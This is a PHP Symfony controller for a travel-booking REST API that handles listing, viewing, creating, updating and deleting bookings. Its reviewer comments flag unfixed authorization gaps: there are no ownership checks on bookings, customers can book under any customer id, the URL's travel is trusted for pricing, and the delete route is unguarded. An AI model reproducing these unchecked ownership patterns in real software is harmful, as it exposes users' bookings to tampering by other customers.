Viewing: TravelBookingController.php
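<?php

namespace AppBundle\Controller\Api;

use Nelmio\ApiDocBundle\Annotation as Doc;
use FOS\RestBundle\Controller\FOSRestController;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\JsonResponse;
use FOS\RestBundle\Controller\Annotations as Rest;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\ParamConverter;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Security;
use AppBundle\Entity\Travel;
use AppBundle\Entity\Ticket;
use AppBundle\Entity\Booking;
use AppBundle\Entity\Customer;
use AppBundle\Form\BookingType;

/**
 * REST endpoints for the bookings attached to a travel.
 *
 * Access control is declared per action with the Security annotation; the
 * actions themselves perform no ownership checks, so anything beyond the role
 * test has to be enforced by the services they call or by a voter.
 */
class TravelBookingController extends FOSRestController
{
    /**
     * Get the list of all bookings related to a travel
     *
     * @Rest\Get("/travels/{travelId}/bookings")
     * @Rest\View(
     *     statusCode = JsonResponse::HTTP_OK,
     *     SerializerGroups = {"LIST", "STANDING_DETAILS", "BOOKING_DETAILS"}
     * )
     * @Doc\ApiDoc(
     *     section="Bookings",
     *     resource=true,
     *     description="Get the list of all bookings related to a travel.",
     * )
     * @Security("has_role('ROLE_OPERATOR')")
     */
    public function listAction(Travel $travel)
    {
        // $travel arrives already resolved; no ParamConverter annotation is
        // declared here, so the {travelId} mapping is presumably configured
        // elsewhere -- TODO confirm.
        $bookingRepository = $this
            ->getDoctrine()
            ->getManager()
            ->getRepository("AppBundle:Booking");

        return $bookingRepository->findByTravel($travel);
    }

    /**
     * Get one booking which is related to a travel.
     * @param integer $travelId The id of the travel
     * @param integer $bookingId The id of the booking
     * @Rest\Get("/travels/{travelId}/bookings/{bookingId}")
     * @Rest\View(
     *     statusCode= JsonResponse::HTTP_OK,
     *     SerializerGroups = {"LIST", "BOOKING_DETAILS"}
     * )
     * @Doc\ApiDoc(
     *     section="Bookings",
     *     resource=true,
     *     description=" Get one booking which is related to a travel.",
     * )
     * @Security("has_role('ROLE_CUSTOMER') or has_role('ROLE_OPERATOR')")
     */
    public function showAction(Booking $booking)
    {
        // NOTE(review): the booking is returned as resolved. Nothing in this
        // method ties it to the {travelId} in the URL or to the connected
        // customer, so a ROLE_CUSTOMER caller is only limited by the role
        // test. Confirm an ownership check (voter, converter or listener)
        // exists elsewhere; otherwise add one here.
        return $booking;
    }

    /**
     * Create a booking for a travel
     * <p>
     * The body of the request must be <br />
     * { <br />
     * "customerId": X, <br />
     * "sitNumber": Y, <br />
     * }
     * </p>
     * where X is the id of an existing Customer.
     *
     * @param integer $travelId The id of the travel
     *
     * @Rest\Post("/travels/{travelId}/bookings")
     * @Rest\View(
     *     statusCode = JsonResponse::HTTP_CREATED,
     *     SerializerGroups = {"LIST", "BOOKING_DETAILS"}
     * )
     * @Doc\ApiDoc(
     *     section="Bookings",
     *     resource=true,
     *     description=" Create a booking for a travel.",
     * )
     * @Security("has_role('ROLE_CUSTOMER') or has_role('ROLE_OPERATOR')")
     */
    public function createAction(Request $request, Travel $travel)
    {
        $bookingManager = $this->get('booking_manager');
        $em = $this->getDoctrine()->getManager();

        // The customer who will travel. Both body fields are mandatory and
        // each missing or unknown value is answered with a 400.
        if (!$request->request->has("customerId")) {
            return new JsonResponse(['Error' => 'missing value for "customerId". '], JsonResponse::HTTP_BAD_REQUEST);
        }

        $customerId = $request->request->get('customerId');
        $customer = $em
            ->getRepository('AppBundle:Customer')
            ->find($customerId);

        if ($customer === null) {
            return new JsonResponse(['Error' => 'no customer with id: '.$customerId], JsonResponse::HTTP_BAD_REQUEST);
        }

        if (!$request->request->has("sitNumber")) {
            return new JsonResponse(['Error' => 'missing value for "sitNumber". '], JsonResponse::HTTP_BAD_REQUEST);
        }

        // NOTE(review): sitNumber is forwarded as received (no type or range
        // check here); presumably booking_manager validates it -- verify.
        $sitNumber = $request->request->get('sitNumber');

        // The user making the booking is recorded only when it is a Customer;
        // for any other user type (e.g. an operator) the maker is left null.
        // NOTE(review): customerId comes from the request body and is never
        // compared with the connected user, so a customer can book on behalf
        // of any other customer id. Confirm this is intended.
        $connectedUser = $this->get('security.token_storage')->getToken()->getUser();
        $bookingMaker = $connectedUser instanceof Customer ? $connectedUser : null;

        return $bookingManager->createBooking($travel, $customer, $bookingMaker, $sitNumber);
    }

    /**
     * Update a Booking
     * <p>
     * The body of the request must be <br />
     * { <br />
     * "sitNumber": Y, <br />
     * "newTravelId": X, <br />
     * } <br />
     * <b>Note</b> The field newTravelId must be specified if we are trying to change the travel concerned by the booking.
     * </p>
     * where X is the id of an existing Travel.
     * @param integer $travelId The id of the travel
     * @Rest\Put("/travels/{travelId}/bookings/{bookingId}")
     * @Rest\View(
     *     statusCode = JsonResponse::HTTP_ACCEPTED,
     *     SerializerGroups = {"LIST", "BOOKING_DETAILS"}
     * )
     * @Doc\ApiDoc(
     *     section="Bookings",
     *     resource=true,
     *     description=" Update a booking for a travel.",
     * )
     * @Security("has_role('ROLE_CUSTOMER') or has_role('ROLE_OPERATOR')")
     */
    public function updateAction(Request $request, Travel $travel, Booking $booking)
    {
        // Two things can change: the seat number and, through newTravelId,
        // the travel the booking is attached to.
        $em = $this->getDoctrine()->getManager();
        $travelManager = $this->get('travel_manager');

        $sitNumber = $request->request->get('sitNumber');
        $newTravelId = $request->request->get('newTravelId');

        // NOTE(review): nothing here checks that $booking belongs to $travel
        // or to the connected customer. $travel (taken from the URL) is also
        // the price baseline below, so it should be verified against the
        // booking's own travel before it is trusted.
        if ($newTravelId) {
            $newTravel = $em
                ->getRepository('AppBundle:Travel')
                ->find($newTravelId);

            // An unknown id used to flow into hasFreeSits() and the cost
            // comparison as null; reject it like createAction rejects an
            // unknown customer.
            if ($newTravel === null) {
                return new JsonResponse(['Error' => 'no travel with id: '.$newTravelId], JsonResponse::HTTP_BAD_REQUEST);
            }

            if ($travelManager->hasFreeSits($newTravel)) {
                // A fully paid ticket may only move to a travel whose seat
                // cost is not higher; an unpaid one may move freely.
                // NOTE(review): getTicket() is dereferenced without a null
                // check -- confirm every booking has a ticket.
                if ($booking->getTicket()->getPaidInFull()) {
                    $newSitCost = $newTravel->getTravelConfig()->getLineStanding()->getSitCost();
                    $currentSitCost = $travel->getTravelConfig()->getLineStanding()->getSitCost();
                    if ($newSitCost <= $currentSitCost) {
                        $travel = $newTravel;
                    }
                } else {
                    $travel = $newTravel;
                }
            }
            // NOTE(review): when the new travel is full or more expensive the
            // request still succeeds with the travel unchanged; the caller
            // gets no error for the refused reassignment.
        }

        if ($sitNumber) {
            if ($travelManager->isBooked($travel, $sitNumber)) {
                return new JsonResponse(['Error' => 'this sit is already booked'], JsonResponse::HTTP_FORBIDDEN);
            }

            $booking->setTravel($travel);
            $booking->setSitNumber($sitNumber);
        } else {
            // NOTE(review): moving to another travel without a sitNumber keeps
            // the old seat number and skips the isBooked() check, so the seat
            // may already be taken on the new travel.
            $booking->setTravel($travel);
        }

        $em->flush();

        return $booking;
    }

    /**
     * Delete a Booking
     * @param integer $travelId The id of the travel
     * @Rest\Delete("/travels/{travelId}/bookings/{bookingId}")
     * @Rest\View(
     *     statusCode = JsonResponse::HTTP_OK
     * )
     */
    public function deleteAction(Booking $booking)
    {
        // Not implemented: every call is refused with a 403.
        // NOTE(review): unlike the other actions this one declares no
        // Security annotation. Add the role restriction before the real
        // deletion logic lands, so the route is never exposed unguarded.
        return new JsonResponse(['Error' => 'TODO'], JsonResponse::HTTP_FORBIDDEN);
    }
}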